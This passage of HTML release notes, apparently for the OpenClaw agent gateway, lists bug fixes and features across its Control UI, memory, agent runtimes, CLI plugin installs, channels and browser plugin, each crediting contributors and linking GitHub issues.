<li>Control UI/Cron: render cron job prompts and run summaries as sanitized markdown in the dashboard, with full-width block content, safer link clicks, and no duplicate error text when a failed run has no summary. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4084972176" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48504" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48504/hovercard" href="https://github.com/openclaw/openclaw/pull/48504">#48504</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garethdaine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garethdaine">@garethdaine</a>.</li>
<li>Control UI/Gateway: preserve WebChat client version labels across localhost, 127.0.0.1, and IPv6 loopback aliases on the same port, avoiding misleading <code>vcontrol-ui</code> connection logs while investigating duplicate-message reports. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334957430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72753/hovercard" href="https://github.com/openclaw/openclaw/issues/72753">#72753</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334796900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72742" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72742/hovercard" href="https://github.com/openclaw/openclaw/issues/72742">#72742</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LumenFromTheFuture/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LumenFromTheFuture">@LumenFromTheFuture</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allesgutefy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allesgutefy">@allesgutefy</a>.</li>
<li>Agents/reasoning: treat orphan closing reasoning tags with following answer text as a privacy boundary across delivery, history, streaming, and Control UI sanitizers so malformed local-model output cannot leak chain-of-thought text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267622881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67092/hovercard" href="https://github.com/openclaw/openclaw/issues/67092">#67092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnildoSilva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnildoSilva">@AnildoSilva</a>.</li>
<li>Memory-core: run one-shot memory CLI commands through transient builtin and QMD managers so <code>memory index</code>, <code>memory status --index</code>, and <code>memory search</code> no longer start long-lived file watchers that can hit macOS <code>EMFILE</code> limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187752224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59101" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59101/hovercard" href="https://github.com/openclaw/openclaw/issues/59101">#59101</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095576345" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49851" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49851/hovercard" href="https://github.com/openclaw/openclaw/pull/49851">#49851</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbear469210-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbear469210-coder">@mbear469210-coder</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoyuanxue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoyuanxue">@maoyuanxue</a>.</li>
<li>Agents/ACP: ship the Claude ACP adapter with OpenClaw and require Claude result messages before idle can complete a prompt, preventing parent agents from waking early on long-running <code>sessions_spawn(runtime: "acp", agentId: "claude")</code> children. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330496541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72080/hovercard" href="https://github.com/openclaw/openclaw/issues/72080">#72080</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siavash-saki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siavash-saki">@siavash-saki</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iannwu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iannwu">@iannwu</a>.</li>
<li>CLI/tasks: route <code>tasks --json</code>, <code>tasks list --json</code>, and <code>tasks audit --json</code> through a lean JSON path so read-only task inspection no longer loads unrelated plugin/runtime command graphs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258741985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66238" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66238/hovercard" href="https://github.com/openclaw/openclaw/issues/66238">#66238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ChuckChambers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ChuckChambers">@ChuckChambers</a>.</li>
<li>Memory-core: re-resolve the active runtime config whenever <code>memory_search</code> or <code>memory_get</code> executes, so provider changes made by <code>config.patch</code> stop leaving stale embedding backends behind in existing tool instances. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206081616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61098" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61098/hovercard" href="https://github.com/openclaw/openclaw/issues/61098">#61098</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BradGroux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BradGroux">@BradGroux</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>WebChat: keep bare <code>/new</code> and <code>/reset</code> startup instructions out of visible chat history while preserving <code>/reset &lt;note&gt;</code> as user-visible transcript text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332044131" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72369" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72369/hovercard" href="https://github.com/openclaw/openclaw/issues/72369">#72369</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/collynes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/collynes">@collynes</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haishmg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haishmg">@haishmg</a>.</li>
<li>Tasks/memory: checkpoint and truncate SQLite WAL sidecars on a timer and before close for task, Task Flow, proxy capture, and builtin memory databases, bounding long-running gateway <code>*.sqlite-wal</code> growth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335184021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72774" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72774/hovercard" href="https://github.com/openclaw/openclaw/issues/72774">#72774</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfpalhano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfpalhano">@dfpalhano</a>.</li>
<li>CLI/doctor: remove dangling channel config, heartbeat targets, and channel model overrides when stale plugin repair removes a missing channel plugin, preventing Gateway boot loops after failed plugin reinstalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247552366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65293" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65293/hovercard" href="https://github.com/openclaw/openclaw/issues/65293">#65293</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidecode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidecode">@yidecode</a>.</li>
<li>Control UI/Gateway: cache, coalesce, stale-refresh, and invalidate effective tool inventory on channel registry changes while reusing the gateway-bound plugin registry and avoiding model/auth discovery, so chat runs no longer stall Control UI requests on repeated plugin/model setup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331993898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72365/hovercard" href="https://github.com/openclaw/openclaw/issues/72365">#72365</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332899080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72558/hovercard" href="https://github.com/openclaw/openclaw/pull/72558">#72558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gabiii2398/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gabiii2398">@Gabiii2398</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1yihui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1yihui">@1yihui</a>.</li>
<li>Channels/setup: treat bundled channel plugins as already bundled during <code>channels add</code> and onboarding, enabling them without writing redundant <code>plugins.load.paths</code> entries or path install records. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334766601" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72740" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72740/hovercard" href="https://github.com/openclaw/openclaw/issues/72740">#72740</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iCodePoet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iCodePoet">@iCodePoet</a>.</li>
<li>WhatsApp: honor gateway <code>HTTPS_PROXY</code> / <code>HTTP_PROXY</code> env vars for QR-login WebSocket connections, while respecting <code>NO_PROXY</code>, so proxied networks no longer fall back to direct <code>mmg.whatsapp.net</code> connections that time out with 408. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332861530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72547" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72547/hovercard" href="https://github.com/openclaw/openclaw/issues/72547">#72547</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333995671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72692" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72692/hovercard" href="https://github.com/openclaw/openclaw/pull/72692">#72692</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mebusw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mebusw">@mebusw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Bonjour: default mDNS advertisements to the system hostname when it is DNS-safe, avoiding <code>openclaw.local</code> probing conflicts and Gateway restart loops on hosts such as <code>Lobster</code> or <code>ubuntu</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331958353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72355/hovercard" href="https://github.com/openclaw/openclaw/issues/72355">#72355</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333934083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72689" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72689/hovercard" href="https://github.com/openclaw/openclaw/issues/72689">#72689</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334059157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72694" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72694/hovercard" href="https://github.com/openclaw/openclaw/pull/72694">#72694</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mscheuerlein-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mscheuerlein-bot">@mscheuerlein-bot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gcusms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gcusms">@gcusms</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moyuwuhen601/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moyuwuhen601">@moyuwuhen601</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pavan987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pavan987">@pavan987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zml-0912/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zml-0912">@zml-0912</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hhq365/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hhq365">@hhq365</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Agents/OpenAI-compatible: retry replay-safe empty <code>stop</code> turns once for <code>openai-completions</code> endpoints, so transient empty local backend responses no longer surface as “Agent couldn't generate a response” when a continuation succeeds, and restore <code>openclaw agent --model</code> for one-shot CLI runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334894224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72751/hovercard" href="https://github.com/openclaw/openclaw/issues/72751">#72751</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moooV252/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moooV252">@moooV252</a>.</li>
<li>Git hooks: skip ignored staged paths when formatting and restaging pre-commit files, so merge commits no longer abort when <code>.gitignore</code> newly ignores staged merged content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334805845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72744/hovercard" href="https://github.com/openclaw/openclaw/issues/72744">#72744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Memory-core/dreaming: add a supported <code>dreaming.model</code> knob for Dream Diary narrative subagents, wired through phase config and the existing plugin subagent model-override trust gate. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255215946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65963/hovercard" href="https://github.com/openclaw/openclaw/issues/65963">#65963</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/esqandil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/esqandil">@esqandil</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Agents/Anthropic: remove trailing assistant prefill payloads when extended thinking is enabled, so Opus 4.7/Sonnet 4.6 requests do not fail Anthropic's user-final-turn validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334735494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72739/hovercard" href="https://github.com/openclaw/openclaw/issues/72739">#72739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/superandylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/superandylin">@superandylin</a>.</li>
<li>Agents/vLLM/Qwen: add plugin-owned Qwen thinking controls for vLLM chat-template kwargs and DashScope-style top-level <code>enable_thinking</code> flags, including preserved thinking for agent loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331705792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72329/hovercard" href="https://github.com/openclaw/openclaw/issues/72329">#72329</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stavrostzagadouris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stavrostzagadouris">@stavrostzagadouris</a>.</li>
<li>Memory-core/dreaming: treat request-scoped narrative fallback as expected, skip session cleanup when no subagent run was created, and remove duplicate phase-level cleanup so fallback no longer emits warning noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268571406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67152" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67152/hovercard" href="https://github.com/openclaw/openclaw/issues/67152">#67152</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Agents/exec: apply configured <code>tools.exec.timeoutSec</code> to background, <code>yieldMs</code>, and node <code>system.run</code> commands when no per-call timeout is set, preventing auto-backgrounded and remote node commands from running indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274573328" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67600" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67600/hovercard" href="https://github.com/openclaw/openclaw/issues/67600">#67600</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274648073" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67603" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67603/hovercard" href="https://github.com/openclaw/openclaw/pull/67603">#67603</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlmpx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlmpx">@dlmpx</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>Config/doctor: stop masking unknown-key validation diagnostics such as <code>agents.defaults.llm</code>, and have <code>openclaw doctor --fix</code> remove the retired <code>agents.defaults.llm</code> timeout block. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aidiffuser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aidiffuser">@aidiffuser</a>.</li>
<li>CLI/startup: keep the built pre-dispatch CLI graph free of package-level imports and extend packaged CLI smoke coverage to onboard and doctor help paths, preventing missing runtime dependencies such as tslog from killing onboarding before repair code can run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223102766" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63024" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63024/hovercard" href="https://github.com/openclaw/openclaw/issues/63024">#63024</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hu19940121/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hu19940121">@hu19940121</a>.</li>
<li>CLI/plugins: preserve unversioned ClawHub install specs so <code>plugins update</code> can follow newer ClawHub releases instead of pinning to the initially resolved version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222950605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63010/hovercard" href="https://github.com/openclaw/openclaw/issues/63010">#63010</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4179937057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58426/hovercard" href="https://github.com/openclaw/openclaw/pull/58426">#58426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kangsen1234/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kangsen1234">@kangsen1234</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robinspt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robinspt">@robinspt</a>.</li>
<li>Memory-core/subagents: tag plugin-created subagent sessions with their plugin owner so dreaming narrative cleanup can delete its own ephemeral sessions without granting broad admin session deletion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334282794" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72712" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72712/hovercard" href="https://github.com/openclaw/openclaw/issues/72712">#72712</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BSG2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BSG2000">@BSG2000</a>.</li>
<li>Gateway/models: move local-provider pricing opt-outs, OpenRouter/LiteLLM aliases, and proxy passthrough pricing lookup into plugin manifest metadata so core no longer carries extension-specific pricing tables.</li>
<li>CLI/update: honor <code>OPENCLAW_NO_AUTO_UPDATE=1</code> as a gateway startup kill-switch for configured background package auto-updates, so operators can hold a deliberate downgrade during incident recovery without editing config first. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334350067" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72715/hovercard" href="https://github.com/openclaw/openclaw/issues/72715">#72715</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xivi08/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xivi08">@Xivi08</a>.</li>
<li>Agents/Claude CLI: force live-session launches to include <code>--output-format stream-json</code> whenever OpenClaw adds <code>--input-format stream-json</code>, so new Claude CLI sessions no longer fail immediately while reusable sessions keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331058930" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72206/hovercard" href="https://github.com/openclaw/openclaw/issues/72206">#72206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kwangwonkoh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kwangwonkoh">@kwangwonkoh</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xivi08/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xivi08">@Xivi08</a>.</li>
<li>CLI/plugins: accept ClawHub plugin API wildcard ranges such as <code>*</code> without rejecting compatible plugin installs, while still requiring a valid runtime API version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160287580" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56446" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56446/hovercard" href="https://github.com/openclaw/openclaw/issues/56446">#56446</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160379824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56466/hovercard" href="https://github.com/openclaw/openclaw/pull/56466">#56466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/darconada/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/darconada">@darconada</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claygeo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claygeo">@claygeo</a>.</li>
<li>CLI/plugins: add an explicit <code>npm:&lt;package&gt;</code> install prefix that skips ClawHub lookup for known npm packages while keeping bare package specs ClawHub-first. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4152647207" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55805/hovercard" href="https://github.com/openclaw/openclaw/issues/55805">#55805</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133768218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54377" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54377/hovercard" href="https://github.com/openclaw/openclaw/pull/54377">#54377</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zeoy2020/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zeoy2020">@Zeoy2020</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vagusX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vagusX">@vagusX</a>.</li>
<li>CLI/plugins: let config-gated bundled plugins install without persisting invalid placeholder config entries, so install/uninstall sweeps can cover plugins such as memory-lancedb before the user configures credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/plugins: reject malformed ClawHub plugin specs with trailing <code>@</code> before registry lookup, so empty-version typos report as invalid specs instead of package-not-found errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161404128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56579" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56579/hovercard" href="https://github.com/openclaw/openclaw/issues/56579">#56579</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161414890" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56582" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56582/hovercard" href="https://github.com/openclaw/openclaw/pull/56582">#56582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kansodata/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kansodata">@Kansodata</a>.</li>
<li>Agents/sessions: acquire the session write lock only after cold bootstrap, plugin, and tool setup so fallback runs are not blocked by stalled pre-model startup work.</li>
<li>Browser/plugins: auto-start the bundled browser plugin when root <code>browser</code> config is present, including restrictive plugin allowlists, and ignore stale persisted plugin registries whose package paths no longer exist.</li>
<li>Browser: circuit-break repeated managed Chrome launch failures per profile so browser requests stop spawning Chromium indefinitely when CDP cannot start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4238688678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64271/hovercard" href="https://github.com/openclaw/openclaw/issues/64271">#64271</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheophilusChinomona/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheophilusChinomona">@TheophilusChinomona</a>.</li>
<li>Gateway/models: skip external OpenRouter and LiteLLM pricing refreshes for local/self-hosted model endpoints so startup does not wait on remote pricing catalogs for local-only Ollama, vLLM, and compatible providers.</li>
